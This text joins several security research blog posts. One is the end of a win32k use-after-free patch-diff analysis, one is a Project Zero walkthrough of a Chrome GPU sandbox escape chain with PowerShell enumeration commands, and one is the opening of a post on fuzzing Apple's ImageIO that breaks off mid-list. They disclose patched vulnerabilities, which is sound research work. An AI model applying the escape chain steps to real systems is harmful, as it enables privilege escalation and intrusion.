*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.

FAULTING_IP: 
win32kfull!xxxNextWindow+743
ffff89ba`965f553b 4d8bbd80000000  mov r15,qword ptr [r13+80h]

 # Child-SP          RetAddr Call Site
00 ffffa003`81fe5f28 fffff806`800aa422 nt!DbgBreakPointWithStatus
01 ffffa003`81fe5f30 fffff806`800a9b12 nt!KiBugCheckDebugBreak+0x12
02 ffffa003`81fe5f90 fffff806`7ffc2327 nt!KeBugCheck2+0x952
03 ffffa003`81fe6690 fffff806`7ffe4663 nt!KeBugCheckEx+0x107
04 ffffa003`81fe66d0 fffff806`7fe73edf nt!MiSystemFault+0x1d6933
05 ffffa003`81fe67d0 fffff806`7ffd0320 nt!MmAccessFault+0x34f
06 ffffa003`81fe6970 ffff89ba`965f553b nt!KiPageFault+0x360    
07 ffffa003`81fe6b00 ffff89ba`965aeb35 win32kfull!xxxNextWindow+0x743 ← UAF
08 ffffa003`81fe6d30 ffff89ba`96b9939f win32kfull!EditionHandleAndPostKeyEvent+0xab005
09 ffffa003`81fe6e10 ffff89ba`96b98c35 win32kbase!ApiSetEditionHandleAndPostKeyEvent+0x15b
0a ffffa003`81fe6ec0 ffff89ba`96baada5 win32kbase!xxxUpdateGlobalsAndSendKeyEvent+0x2d5
0b ffffa003`81fe7000 ffff89ba`96baa7fb win32kbase!xxxKeyEventEx+0x3a5
0c ffffa003`81fe71d0 ffff89ba`964e3f44 win32kbase!xxxProcessKeyEvent+0x1ab
0d ffffa003`81fe7250 ffff89ba`964e339b win32kfull!xxxInternalKeyEventDirect+0x1e4
0e ffffa003`81fe7320 ffff89ba`964e2ccd win32kfull!xxxSendInput+0xc3
0f ffffa003`81fe7390 fffff806`7ffd3b15 win32kfull!NtUserSendInput+0x16d
10 ffffa003`81fe7440 00007ffb`7d0b2084 nt!KiSystemServiceCopyEnd+0x25
11 0000002b`2a5ffba8 00007ff6`a4da1335 win32u!NtUserSendInput+0x14
12 0000002b`2a5ffbb0 00007ffb`7f487bd4 WizardOpium+0x1335 <- My POC
13 0000002b2a5ffc10 00007ffb7f86ced1 KERNEL32!BaseThreadInitThunk+0x14
14 0000002b2a5ffc40 0000000000000000 ntdll!RtlUserThreadStart+0x21

BUILD_VERSION_STRING:  18362.1.amd64fre.19h1_release.190318-1202

To trigger the crash, I only had to change two things in the Windows 7 POC:
  1. The keystrokes are different to trigger the xxxNextWindow task switch window on Windows 10. I was able to trigger it by smashing CTRL+ALT+TAB while the POC was running (and triggering the normal task switch Window). It is possible to do this programmatically, I just didn’t take the time to code it up.
  2. Overwrite index 0x61 instead of 0x57 in the KernelCallbackTable.

It took me about 3 hours to get the POC to trigger Driver Verifier on Windows 10 1903 regularly (about every 3rd time it's run). 
Disassembly at xxxNextWindow+737 in Oct 2019 Update
Disassembly at xxxNextWindow+73F in Nov 2019 Update

The fix in the November update for Windows 10 1903 is the same as the Windows 7 fix: 
  • Add the UnlockQueue function.
  • Add locking around the call to xxxNextWindow.
  • Check the “destroyed” bitflag in the tagQ struct before proceeding to use the queue. 

FIXING THE VULNERABILITY

To patch the CVE-2019-1433  vulnerability, Microsoft changed four functions: 
  • xxxNextWindow
  • xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10)
  • zzzDestroyQueue
  • UnlockQueue (new function)

Overall, the changes are to prevent the queue structure from being freed and track if something attempted to destroy the queue. The addition of the new function, UnlockQueue, suggests that there were no previous locking mechanisms for queue objects. 

zzzDestroyQueue Patch

The only change to the zzzDestroyQueue function in win32k is that if the refcount on the tagQ structure (tagQ.cLockCount) is greater than 0 (keeping the queue from being freed immediately), then the function now sets a bit in tagQ.QF_flags.




zzzDestroyQueue Pre-Patch



zzzDestroyQueue Post-Patch

xxxNextWindow Patch
There is a single change to the xxxNextWindow function as shown by the BinDiff graph below. When execution is about to use the queue again (at what was LABEL_106 in the vulnerable version), a check has been added to see if a bitflag in tagQ.QF_flags is set. The instructions added to xxxNextWindow+0x847 are as follows where rbp is the pointer to the tagQ structure.

bt      dword ptr [rbp+13Ch], 1Ah
jb      loc_FFFFF9600017A0C9

If the bit is set, the function exists. If the bit is not set, the function continues and will use the queue. The only place this bit is set is in zzzDestroyQueue. The bit is set when the queue was destroyed, but couldn't be freed immediately because its refcount (tagQ.cLockCount) is greater than 0. Setting the bit is a new change to the code base as described in the section above. 


xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10) Patch

In this section I will simply refer to the function as xxxKeyEvent since Windows 7 was the main platform analyzed. However, the changes are also found in the EditionHandleAndPostKeyEvent function in Windows 10. 

The change to xxxKeyEvent is to thread lock the queue that is passed as the first argument to xxxNextWindow. Thread locking doesn’t appear to be publicly documented by Microsoft. My understanding comes from Tarjei Mandt’s 2011 Blackhat USA presentation, “Kernel Attacks through User-Mode Callbacks”. Thread locking is where objects are added to a thread’s lock list, and their ref counter is increased in the process. This prevents them from being freed while they are still locked to the thread. 

The new function, UnlockQueue, is used to unlock the queue. 

if ( !queue )
    queue = gptiRit->pq;
xxxNextWindow(queue, vkey_cp);
xxxKeyEvent+92E Pre-Patch

if ( !queue )
    queue = gptiRit->pq;
++queue->cLockCount;
currWin32Thread = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v62);
threadLockW32 = currWin32Thread->ptlW32;
currWin32Thread->ptlW32 = (_TL *)&threadLockW32;
queueCp = queue;
unlockQueueFnPtr = (void (__fastcall *)(tagQ *))UnlockQueue;
xxxNextWindow(queue, vkey_cp);
currWin32Thread2 = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v64);
currWin32Thread2->ptlW32 = threadLockW32;
unlockQueueFnPtr(queueCp);
xxxKeyEvent+94E Post-Patch

CONCLUSION

So...I got it wrong. Based on the details provided by Kaspersky in their blog post, I attempted to patch diff the vulnerability in order to do a root cause analysis. It was only based on the feedback from Microsoft (Thanks, Microsoft!) and their guidance to look at the InitFunctionTables method, that I realized I had analyzed a different bug. I analyzed CVE-2019-1433 rather than CVE-2019-1458, the vulnerability exploited in the wild. The real root cause analysis for CVE-2019-1458 was documented by @florek_pl here.

If I had patch-diffed November 2019 to December 2019 rather than September to December, then I wouldn’t have analyzed the wrong bug. This seems obvious after the fact, but when just starting out, I thought that maybe Windows 7, being so close to end of life, didn’t get updates every single month. Now I know to not only rely on Windows Update, but also to look for KB articles and that I can download additional updates from the Microsoft Update Catalog.

Although this blog post didn’t turn out how I originally planned, I decided to share it in the hopes that it’d encourage others to explore a platform new to them. It’s often not a straight path, but if you’re interested in Windows kernel research, this is how I got started. In addition, I think this was a fun and quite interesting bug!

I didn’t initially set out to do a patch diffing exercise on this vulnerability, but I do think that this work gives us another data point to use in disclosure discussions. It took me, someone with reversing, but no Windows experience, three weeks to understand the vulnerability and write a proof-of-concept. While I ended up doing this analysis for a vulnerability other than the one I intended, many attackers are not looking to patch-diff a specific vulnerability, but rather any vulnerability that they could potentially exploit. Therefore, I think that three weeks can be used as an approximate high upper bound since most attackers looking to use this technique will have more experience.

You Won't Believe what this One Line Change Did to the Chrome Sandbox

21 April 2020 at 18:25
By: Tim

Posted by James Forshaw, Project Zero


The Chromium sandbox on Windows has stood the test of time. It’s considered one of the better sandboxing mechanisms deployed at scale without requiring elevated privileges to function. For all the good, it does have its weaknesses. The main one being the sandbox’s implementation is reliant on the security of the Windows OS. Changing the behavior of Windows is out of the control of the Chromium development team. If a bug is found in the security enforcement mechanisms of Windows then the sandbox can break.

This blog is about a vulnerability introduced in Windows 10 1903 which broke some of the security assumptions that Chromium relied on to make the sandbox secure. I’ll present how I used the bug to develop a chain of execution to escape the sandbox as used for the GPU Process on Chrome/Edge or the default content sandbox in Firefox. The exploitation process is also an interesting insight into the little weaknesses in Windows which in themselves do not cross a security boundary but led to a successful sandbox escape. This vulnerability was fixed in April 2020 as CVE-2020-0981.

Background to the Issue

Let’s have a quick look at how the Chromium sandbox works on Windows before describing the bug itself. The sandbox works on the concept of least privilege by using Restricted Tokens. A Restricted Token is a feature added in Windows 2000 to reduce the access granted to a process through the modification of the Process’s Access Token through the following operations:
  • Permanently disabling Groups.
  • Removing Privileges.
  • Adding Restricted SIDs.

Disabling groups removes the Access Token’s membership, resulting in disabling access to resources secured by those groups. Removing privileges prevents the process from performing any unnecessary privileged operations. Finally, adding restricted SIDs changes the security access check process. To be granted access to a resource we need to match a security descriptor entry for both a group in our main list as well as the list of Restricted SIDs. If one of the lists of SIDs does not grant access to the resource then access will be denied.

Chromium also uses the Integrity Level (IL) feature added in Vista to further restrict resource access. By setting a low IL we can block write access to higher integrity resources regardless of the result of the access check.

Using Restricted Tokens with IL in this way allows the sandbox to limit what resources a compromised process can access and therefore the impact an RCE can have. It’s especially important to block write access as that would typically grant an attacker leverage to compromise other parts of the system by writing files or registry keys.

Any process on Windows can create a new process with a different Token, for example by calling CreateProcessAsUser. What stops a sandboxed process creating a new process using an unrestricted token? Windows and Chromium implement a few security mitigations to make creating a new process outside of the sandbox difficult:
  1. The Kernel restricts what Tokens can be assigned by an unprivileged user to a new process.
  2. The sandbox restrictions limit the availability of suitable access tokens to use for the new process.
  3. Chromium runs a sandboxed process inside a Job object which is inherited by any child processes which has a hard process quota limit of 1.
  4. From Windows 10, Chromium uses the Child Process Mitigation Policy to block child process creation. This is applied in addition to the Job object from 3.

All of these mitigations are ultimately relying on Windows to be secure. However by far the most critical is 1. Even if 2 through 4 fail, in theory we shouldn’t be able to assign a more privileged access token to the new process. What is the kernel checking when it comes to assigning a new token?

Assuming the calling process doesn’t have SeAssignPrimaryTokenPrivilege (which we don’t) then the new token must meet one of two criteria which are checked in the kernel function SeIsTokenAssignableToProcess. The criteria are based on specified values in the kernel’s TOKEN object structure as shown in the following diagram

Parent/Child and Sibling Process Token Assignment Relationships


In summary the token must either be:
  1. A child of the current process token. Based on the new token’s Parent Token ID being equal to the Process Token’s ID.
  2. A sibling of the current process token. Based on both the Parent Token ID and Authentication ID fields being equal.

There’s also additional checks to ensure that the new Token is not an identification level impersonation token (due to this bug I reported) and the IL of the new token must be less than or equal to the current process token. These are equally important, but as we’ll see, less useful in practice.

One thing the token assignment does not obviously check is whether the Parent or Child tokens are restricted. If you were in a restricted token sandbox could you get an Unrestricted Token which passes all of the checks and assign it to a child effectively escaping the sandbox? No you can’t, the system ensures the Sibling Token check fails when assigning Restricted Tokens and instead ensures the Parent/Child check is the one which will be enforced. If you inspect the kernel function SepFilterToken, you’ll understand how this is implemented. The following code is executed when copying the existing properties from the parent token to the new restricted token.

NewToken->ParentTokenId = OldToken->TokenId;

By setting the new Restricted Token’s Parent Token ID it ensures that only the process which created the Restricted Token can use it for a child as the Token ID is unique for every instance of a TOKEN object. At the same time by changing the Parent Token ID the sibling check is broken. 

However, when I was doing some testing to verify the token assignment behavior on Windows 10 1909 I noticed something odd. No matter what Restricted Token I created I couldn’t get the assignment to fail. Looking at SepFilterToken again I found the code had changed.

NewToken->ParentTokenId = OldToken->ParentTokenId;

The kernel code was now just copying the Parent Token ID directly across from the old token. This completely breaks the check, as the new sandboxed process has a token which is considered a sibling of any other token on the desktop.

This one line change could just be sufficient to break out of the Restricted Token sandbox, assuming I could bypass the other 3 child process mitigations already in place. Let’s go through the trials and tribulations undertaken to do just that.

Escaping the Sandbox

The final sandbox escape I came up with is quite complicated, it’s also not necessarily the optimal approach. However, the complexity of Windows means it can be difficult to find alternative primitives to exploit in our chain.

Let’s start with trying to get a suitable access token to assign to a new process. The token needs to meet some criteria:
  1. The Token is a Primary token or convertible to a Primary Token.
  2. The Token has an IL equal to the sandbox IL, or is writable so that the IL level can be reduced.
  3. The Token meets the sibling token criteria so that it can be assigned.
  4. The Token is for the current Console Session.
  5. The Token is not sandboxed or is less sandboxed than the current token.

Access Tokens are securable objects therefore if you have sufficient access you can open a handle to a Token. However, Access Tokens are not referred to by a name, instead to open a Token you need to have access to either a Process or an Impersonating Thread. We can use my NtObjectManager PowerShell module to find accessible tokens using the Get-AccessibleToken command.

PS> $ps = Get-NtProcess -Name "chrome.exe" `
                  -FilterScript { $_.IsSandboxToken } `
                  -IgnoreDeadProcess
PS> $ts = Get-AccessibleToken -Processes $ps -CurrentSession `
                              -AccessRights Duplicate
PS> $ts.Count
101

This script gets a handle to every sandboxed Chrome process running on my machine (obviously start Chrome first), then uses the access token from each process to determine what other tokens we can open for TOKEN_DUPLICATE access. The reason for checking for TOKEN_DUPLICATE to use as the token in a new process is that we need to make a copy of the token as two processes can’t use the same access token object. The access check takes into account whether the calling process would have PROCESS_QUERY_LIMITED_INFORMATION access to the target process which is a prerequisite for opening the Token. We’ve got a fair number of results, over 100 entries.

However this number is deceiving, for a start, some of the Tokens we can access will almost certainly be sandboxed more than the current token is sandboxed. Really we want only accessible tokens which are unsandboxed. Secondly, while there’s a lot of accessible tokens, that's likely an artifact of a small number of processes being able to access a large number of tokens. We’ll filter it down to just the command lines of the Chrome processes which can access non-sandboxed tokens.

PS> $ts | ? Sandbox -ne $true | `
    Sort {$_.TokenInfo.ProcessCommandLine} -Unique | `
    Select {$_.TokenInfo.ProcessId},{$_.TokenInfo.ProcessCommandLine}

ProcessId ProcessCommandLine
--------- ----------------------------------
     6840 chrome.exe --type=gpu-process ...
    13920 chrome.exe --type=utility --service-sandbox-type=audio ...

Out of all the potential Chrome processes only the GPU process and the Audio utility process have access to non-sandbox tokens. This shouldn’t come as a massive surprise. The renderer processes are significantly more locked down than either the GPU or Audio sandboxes due to the limitations of calling into system services for those processes to function. This does mean that the likelihood of an RCE to sandbox escape is much reduced, as most RCE occur in rendering HTML/JS content. That said GPU bugs do exist, for example this bug is one used by Lokihardt at Pwn2Own 2016.

Let’s focus on escaping the GPU process sandbox. As I don’t have a GPU RCE to hand I’ll just inject a DLL into the process to run the escape. That’s not as simple as it sounds, once the GPU process has started the process is locked down to only loading Microsoft signed DLLs. I use a trick with KnownDlls to load the DLL into memory (see this blog post for full details).

In order to escape the sandbox we need to do is the following:
  1. Open an unrestricted token.
  2. Duplicate token to create a new Primary Token and make the token writable.
  3. Drop the IL of the token to match the current token (for GPU this is Low IL)
  4. Call CreateProcessAsUser with the new token.
  5. Escape Low IL sandbox.

Even for step 1 we’ve got a problem. The simplest way of getting an unrestricted token would be to open the token for the parent process which is the main Chrome browser process. However, if you look through the list of tokens the GPU process can access you’ll find that the main Chrome browser process is not included. Why is that? This is intentional, as I realized after reporting this bug in the kernel that a GPU process sandbox could open the browser process’ token. With this token it’s possible to create a new restricted token which would pass the sibling check to create a new process with much more access and escape the sandbox. To mitigate this I modified the access for the process token to block lower IL processes from opening the token for TOKEN_DUPLICATE access. See HardenTokenIntegerityLevelPolicy. Prior to this fix you didn’t need a bug in the kernel to escape the Chrome GPU sandbox, at least to a normal Low IL token.

Therefore the easy route is not available to us, however we should be able to trivially enumerate processes and find one which meets our criteria. We can do this by using the NtGetNextProcess system call as I described in a previous blog post (on a topic we’ll come back to later). We open all processes for PROCESS_QUERY_LIMITED_INFORMATION access, then open the token for TOKEN_DUPLICATE and TOKEN_QUERY access. We can then inspect the token to ensure it’s unrestricted before proceeding to step 2.

To duplicate the token we call DuplicateTokenEx and request a primary token passing TOKEN_ALL_ACCESS as the desired access. But there’s a new problem, when we try and lower the IL we get ERROR_ACCESS_DENIED from SetTokenInformation. This is due to a sandbox mitigation Microsoft added to Windows 10 and back ported to all supported OS’s (including Windows 7). The following code is a snippet from NtDuplicateToken where the mitigation has been introduced.

ObReferenceObjectByHandle(TokenHandle, TOKEN_DUPLICATE, 
    SeTokenObjectType, &Token, &Info);
DWORD RealDesiredAccess = 0;
if (DesiredAccess) {
    SeCaptureSubjectContext(&Subject);
    if (RtlIsSandboxedToken(Subject.PrimaryToken) 
     && RtlIsSandboxedToken(Subject.ClientToken)) {
        BOOLEAN IsRestricted;
        SepNewTokenAsRestrictedAsProcessToken(Token,
            Subject.PrimaryToken, &IsRestricted);
        if (Token == Subject.PrimaryToken || IsRestricted)
            RealDesiredAccess = DesiredAccess;
        else
            RealDesiredAccess = DesiredAccess 
                & (Info.GrantedAccess | TOKEN_READ | TOKEN_EXECUTE);
    }
} else {
    RealDesiredAccess = Info.GrantedAccess;
}

SepDuplicateToken(Token, &DuplicatedToken, ...)
ObInsertObject(DuplicatedToken, RealDesiredAccess, &Handle);

When you duplicate a token the kernel checks if the caller is sandboxed. If sandboxed the kernel then checks if the token to be duplicated is less restricted than the caller. If it’s less restricted then the code limits the desired access to TOKEN_READ and TOKEN_EXECUTE. This means that if we request a write access such as TOKEN_ADJUST_DEFAULT it’ll be removed on the handle returned to us from the duplication call. In turn this will prevent us reducing the IL so that it can be assigned to a new process.

This would seem to end our exploit chain. If we can’t write to the token, we can’t reduce the token’s IL, which prevents us from assigning it. But the implementation has a tiny flaw, the duplicate operation continues to complete and returns a handle just with limited access rights. When you create a new token object the default security grants the caller full access to the Token object. This means once you get back a handle to the new Token you can call the normal DuplicateHandle API to convert it to a fully writable handle. It’s unclear if this was intentional or not, although it should be noted that the similar check in CreateRestrictedToken returns an error if the new token isn’t as restricted. Whatever the case we can abuse this misfeature to get an writable unrestricted token to assign to the new process with the correct IL.

Now that we can get an unrestricted token we can call CreateProcessAsUser to create our new process. But not so fast, as the GPU process is still running in a restrictive Job object which prevents creating new processes. I detailed how Job objects prevent new process creation in my “In-Console-Able” blog post almost 5 years ago. Can we not use the same bug in the Console Driver to escape the Job object? On Windows 8.1 you probably can (although I’ll admit I’ve not tested), however on Windows 10 there’s two things which prevent us from using it:
  1. Microsoft changed Job objects to support an auxiliary process counter. If you have SeTcbPrivilege you can pass a flag to NtCreateUserProcess to create a new process still inside the Job which doesn’t count towards the process count. This is used by the Console Driver to remove the requirement to escape the Job. As we don’t have SeTcbPrivilege in the sandbox we can’t use this feature.
  2. Microsoft added a new flag to Tokens which prevent them being used for a new process. This flag is set by Chrome on all sandboxed processes to restrict new child processes. Even without ‘1’ the flag would block abusing the Console Driver to spawn a new process.

The combination of these two features blocks spawning a new process outside of the current Job by abusing the Console Driver. We need to come up with another way of escaping both the Job object restriction and to also circumvent the child process restriction flag. 

The Job object is inherited from parent to child, therefore if we could find a process outside of a Job object which the GPU process can control we can use that process as a new parent and escape the Job. Unfortunately, at least by default, if you check what processes the GPU process can access it can only open itself.

PS> Get-AccessibleProcess -ProcessIds 6804 -AccessRights GenericAll `
             | Select-Object ProcessId, Name
ProcessId Name
--------- ----
     6804 chrome.exe

Opening itself isn’t going to be very useful, and we can’t rely on getting lucky with a process which just happens to be running at the time which is both accessible and not running a Job. We need to make our own luck. 

One thing I noticed is that there’s a small race condition setting up a new Chrome sandbox process. The process is first created, then the Job object is applied. If we could get the Chrome browser to spawn a new GPU process we could use it as a parent before the Job object is applied. The handling of the GPU process even supports respawning the process if it crashes. However I couldn’t find a way of getting a new GPU process to spawn without also causing the current one to terminate so it wasn’t possible to have code running long enough to exploit the race.

Instead I decided to concentrate on finding a RPC service which would create a new process outside of the Job. There’s quite a few RPC services where process creation is the main goal, and others where process creation is a side effect. For example I already documented the Secondary Logon service in a previous blog post where the entire purpose of the RPC service is to spawn new processes. 

There is a slight flaw in this idea though, specifically the child process mitigation flag in the token is inherited across impersonation boundaries. As it’s common to use the impersonated token as the basis for the new process any new process will be blocked. However, we have an unrestricted token that does not have the flag set. We can use the unrestricted token to create a restricted token we can impersonate during a RPC call and we can bypass the child process mitigation flag.

I tried to list what known services could be used in this way, which I’ve put together in the following table:

Service
Is Accessible
Can Escape Job
Secondary Logon Service
No
No
WMI Win32_Process
No
Yes
User Account Control (UAC)
Yes
No
Background Intelligent Transfer Service (BITS)
No
Yes
DCOM Activator
Yes
Yes

The table is not exhaustive and there’s likely to be other RPC services which would allow processes to be created. As we can see in the table, well known RPC services which spawn processes such as Secondary Logon, WMI and BITS are not accessible from our sandbox level. The UAC service is accessible and as I described in a previous blog post there exists a way of abusing the service to run arbitrary privileged code by abusing debug objects. Unfortunately when a new UAC process is created the service sets the parent process to the caller process. As the Job object is inherited the new process will be blocked. 

The last service in the list is the DCOM Activator. This is the system service which is responsible for starting out-of-process COM servers and is accessible from our sandbox level. It also starts all COM servers as children of the service process which means the Job object is not inherited. Seems ideal, however there is a slight issue, in order for the DCOM Activator to be useful we need an out-of-process COM server that the sandbox can create. This object must meet a set of criteria:

  1. The Launch Security for the server grants local activation to the sandbox.
  2. The server must not run as Interactive User (which would spawn out of the sandbox) or inside a service process.
  3. The server executable must be accessible to the restricted token.

We don’t have to worry about criteria 3, the GPU process can access system executables so we’ll stick to pre-installed COM servers. It also doesn’t matter if we can’t access the COM server after creation, all we need is the rights to start the COM server process outside of the Job and then we can hijack it. We can find accessible COM servers using OleViewDotNet and the Select-ComAccess command.

PS> Get-ComDatabase -SetCurrent
PS> Get-ComClass -ServerType LocalServer32 | `
      Where-Object RunAs -eq "" | `
      Where-Object {$_.AppIdEntry.ServiceName -eq ""} | `
      Select-ComAccess -ProcessId 6804 `
           -LaunchAccess ActivateLocal -Access 0 | `
      Select-Object Clsid, DefaultServerName

Clsid                                DefaultServerName
-----                                -----------------
3d5fea35-6973-4d5b-9937-dd8e53482a56 coredpussvr.exe
417976b7-917d-4f1e-8f14-c18fccb0b3a8 coredpussvr.exe
46cb32fa-b5ca-8a3a-62ca-a7023c0496c5 ieframe.dll
4b360c3c-d284-4384-abcc-ef133e1445da ieframe.dll
5bbd58bb-993e-4c17-8af6-3af8e908fca8 ieproxy.dll
d63c23c5-53e6-48d5-adda-a385b6bb9c7b ieframe.dll

On a default installation of Windows 10 we have 6 candidates. Note that the last 4 are all in DLLs, however these classes are registered to run inside a DLL Surrogate so can still be used out-of-process. I decided to go for the servers in COREDPUSSVR because it’s a unique executable rather than the generic DLLHOST so makes it easier to find. The Launch Security for this COM server grants Everyone and all AppContainer packages local activation permission as shown below:

Security Descriptor view for COM Class showing Everyone has Access and Low Integrity Level


As an aside, even though there are two classes registered for COREDPUSSVR, only the one starting with 417976b7 is actually registered by the executable. Creating the other class will start the server executable, however the class creation will hang waiting for a class which will never come.

To start the server you call CoCreateInstance while impersonating the child process mitigation flag-free restricted token. You need to pass the CLSCTX_ENABLE_CLOAKING as well to activate the server using the impersonation token, the default would use the process token which has the child process mitigation flag set and so would block process creation. Doing this, you’ll find an instance of COREDPUSSVR running at the same sandbox level however outside of the Job object and without the child process mitigation. Success?

Not so fast. Normally the default security of a new process is based on the default DACL inside the access token used to create it. Unfortunately for some unclear reason the DCOM activator sets an explicit DACL on the process which only grants access to the user, SYSTEM and the current logon SID. This doesn’t allow the GPU process to open the new COM server process, even though it’s running at effectively the same security level. So close and yet so far. I tried a few approaches to get code executed inside the COM server such as Windows Hooks however nothing obvious worked.

Fortunately, the default DACL is still used for any threads created after process startup. We can open one of those threads for full access and change the thread context to redirect execution using SetThreadContext. We’ll need to brute force the thread IDs of these new threads as further sandbox mitigations block us from using CreateToolhelp32Snapshot to enumerate processes we can’t open directly, and the NtGetNextThread API requires the parent process handle which we also don’t have. 

Abusing threads is painful especially as we can’t write anything into the process directly, but it at least works. Where to redirect execution to? I decided for simplicity to call WinExec, which will spawn a new process and only requires a command line to execute. The new process will have the security based on the default DACL and so we can open it. I could have chosen something else like LoadLibrary to load a DLL in-process. However when messing with thread contexts there’s a chance of crashing the process. I felt it was best just avoid that by escaping the process as quickly as possible.

What to use as the command line for WinExec? We can’t directly write or allocate memory in the COM server process but we can easily repurpose existing strings in the binary to execute. To avoid having to find string addresses or deal with ASLR I just chose to use the PE signature at the start of DLL which gives us the string “PE”. When passed to WinExec the current PATH environment variable will be used to find the executable to start. We can set PATH to anything we like in the COM server as the DCOM activator will use the caller’s environment when starting a process at the same security level. The only thing we need to do is find a directory we can write to, and this time we can use Get-AccessibleFile to find a candidate as shown.

PS> Get-AccessibleFile -Win32Path "C:\" -Recurse -ProcessIds 6804 `
     -DirectoryAccessRights AddFile -CheckMode DirectoriesOnly `
     -FormatWin32Path | Select-Object Name
Name
----
C:\ProgramData\Microsoft\DeviceSync

By setting the PATH Environment variable to contain the DeviceSync path and copying an executable named PE.exe to that directory we can set the thread context and spawn a new process which is out of the Job object and can be opened by the GPU process.

We can now exploit the kernel bug and call CreateProcessAsUser from the new process with the unrestricted token running at Low IL. This removes all sandboxing except for Low IL. The final step is breaking out of Low IL.Again there’s probably plenty of ways of doing this but I decided to abuse the UAC service. I could have abused the Debug Object bug documented in my previous blog, however I decided to abuse a different “feature” of UAC. By abusing the same Token access we’re abusing in the chain to open the unrestricted token we can get UI Access permissions. This allows us to automate privileged UI (such as the Explorer Run Dialog) to execute arbitrary code outside of the Low IL sandbox. It’s not necessarily efficient but it’s more photogenic. Full documentation for this attack is available in another blog post.

The final chain is as follows:
  1. Open an unrestricted token.
    1. Brute force finding the process until a suitable process token is found.
  2. Duplicate token to create a new Primary Token and make the token writable.
    1. Duplicate Token as Read Only
    2. Duplicate Handle to get back Write Access
  3. Drop the IL of the token to match the current token.
  4. Call CreateProcessAsUser with the new token.
    1. Create a new restricted token to remove the child process mitigation flag.
    2. Set the environment block’s PATH to contain the DeviceSync folder and drop the PE.exe file.
    3. Impersonate restricted token and create OOP COM server.
    4. Brute force thread IDs of the COM server process.
    5. Modify thread context to call WinExec passing the address of a known PE signature in memory.
    6. Wait for the PE process to be created.
  5. Escape Low IL sandbox.
    1. Spawn a copy of the On-Screen Keyboard and open its token.
    2. Create a new process with UI Access permission based on the opened token.
    3. Automate the Run dialog to escape the Low IL sandbox.

Or in diagrammatic form:

Full chain overview of sandbox escape

Wrapping Up

I hope this gives an insight into how such a small change in the Windows kernel can have a disproportionate impact on the security of a sandbox environment. It also demonstrates the value of exploit mitigations around sandbox behaviors. At numerous points the easy path to exploitation was shut down due to the mitigations.

It’d be interesting to read the post-mortem on how the vulnerability was introduced. I find it likely that someone was updating the code and thought that this was a mistake and so “fixed” it. Perhaps there was no comment indicating its purpose, or just the security critical nature of the single line was lost in the mists of time. Whatever the case it should now be fixed, which indicates it wasn’t an intentional change.

Due to “features” in the OS, there’s usually some way around these mitigations to achieve your goal even if it takes a lot of effort to discover. These features are not in themselves security issues but are useful for building chains.

Fuzzing ImageIO

28 April 2020 at 17:09
By: Tim
Posted by Samuel Groß, Project Zero

This blog post discusses an old type of issue, vulnerabilities in image format parsers, in a new(er) context: on interactionless code paths in popular messenger apps. This research was focused on the Apple ecosystem and the image parsing API provided by it: the ImageIO framework. Multiple vulnerabilities in image parsing code were found, reported to Apple or the respective open source image library maintainers, and subsequently fixed. During this research, a lightweight and low-overhead guided fuzzing approach for closed source binaries was implemented and is released alongside this blogpost.

To reiterate an important point, the vulnerabilities described throughout this blog are reachable through popular messengers but are not part of their codebase. It is thus not the responsibility of the messenger vendors to fix them. 

Introduction


While reverse engineering popular messenger apps, I came across the following code (manually decompiled into ObjC and slightly simplified) on a code path reachable without user interaction:

NSData* payload = [handler decryptData:encryptedDataFromSender, ...];
if (isImagePayload) {
    UIImage* img = [UIImage imageWithData:payload];
    ...;
}

This code decrypts binary data received as part of an incoming message from the sender and instantiates a UIImage instance from it. The UIImage constructor will then try to determine the image format automatically. Afterwards, the received image is passed to the following code:

CGImageRef cgImage = [image CGImage];
CGColorSpaceRef colorSpace = CGColorSpaceCreateDeviceRGB();
CGContextRef cgContext = CGBitmapContextCreate(0, thumbnailWidth, thumbnailHeight, ...);
CGContextDrawImage(cgContext, cgImage, ...);
CGImageRef outImage = CGBitmapContextCreateImage(cgContext);
UIImage* thumbnail = [UIImage imageWithCGImage:outImage];


The purpose of this code is to render a smaller sized version of the input image for use as a thumbnail in a notification for the user. Unsurprisingly, similar code can be found in other messenger apps as well. In essence, code like the one shown above turns Apple’s UIImage image parsing and CoreGraphics image rendering code into 0click attack surface.

One of the insights gained from developing an exploit for an iMessage vulnerability was that a memory corruption vulnerability could likely be exploited using the described techniques if the following preconditions are met:

  1. A form of automatic delivery receipt sent from the same process handling the messages
  2. Per-boot ASLR of at least some memory mappings
  3. Automatically restarting services

In that case, the vulnerability could for example be used to corrupt a pointer to an ObjC object (or something similar), then construct a crash oracle to bypass ASLR, then gain code execution afterwards.

All preconditions are satisfied in the current attack scenario, thus prompting some research into the robustness of the exposed image parsing code. Looking into the documentation of UImage, the following sentence can be found: “You use image objects to represent image data of all kinds, and the UIImage class is capable of managing data for all image formats supported by the underlying platform”. As such, the next step was determining exactly what image formats were supported by the underlying platform.

An Introduction to ImageIO.framework


Parsing of image data passed to UIImage is implemented in the ImageIO framework. As such, the supported image formats can be enumerated by reverse engineering the ImageIO library (/System/Library/Frameworks/ImageIO.framework/Versions/A/ImageIO on macOS or part of the dyld_shared_cache on iOS).

In the ImageIO framework, every supported image format has a dedicated IIO_Reader subclass for it. Each IIO_Reader subclass is expected to implement a testHeader function which, when given a chunk of bytes, should decide whether these bytes represent an image in the format supported by the reader. An example implementation of the testHeader implementation for the LibJPEG reader is shown below. It simply tests a few bytes of the input to detect the JPEG header magic.

bool IIO_Reader_LibJPEG::testHeader(IIO_Reader_LibJPEG *this, const unsigned __int8 *a2, unsigned __int64 a3, const __CFString *a4)
{
  return *a2 == 0xFF && a2[1] == 0xD8 && a2[2] == 0xFF;
}

By listing the different testHeader implementations, it thus becomes possible to compile a list of file formats supported by the ImageIO library. The list is as follows:

IIORawCamera_Reader::testHeader
IIO_Reader_AI::testHeader
IIO_Reader_ASTC::testHeader
IIO_Reader_ATX::testHeader
IIO_Reader_AppleJPEG::testHeader
IIO_Reader_BC::testHeader
IIO_Reader_BMP::testHeader
IIO_Reader_CUR::testHeader
IIO_Reader_GIF::testHeader
IIO_Reader_HEIF::testHeader
